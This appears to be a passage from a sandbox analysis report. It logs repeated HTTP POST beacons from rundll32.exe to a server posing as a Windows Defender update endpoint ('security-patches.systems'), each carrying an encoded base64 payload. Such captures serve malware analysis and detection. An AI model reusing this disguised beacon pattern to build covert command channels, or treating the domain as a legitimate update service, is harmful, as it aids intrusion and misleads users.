Dec 6, 2024 22:11:43.665031910 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:45.177700043 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49764	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:45.445751905 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:47.057837009 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49769	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:47.320147038 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:48.904329062 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49773	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:49.169487000 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:50.930134058 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49778	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:51.193985939 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:52.867885113 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49782	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:53.131274939 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:54.653659105 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:54 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49784	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:54.917206049 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:56.353245974 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:56 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49785	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:56.617316008 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:58.056699038 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49786	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:11:58.452136993 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:11:59.885176897 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:11:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49787	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:00.150755882 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:01.598551035 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49789	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:01.886512995 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:03.330734015 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49790	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:03.663961887 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:05.261639118 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

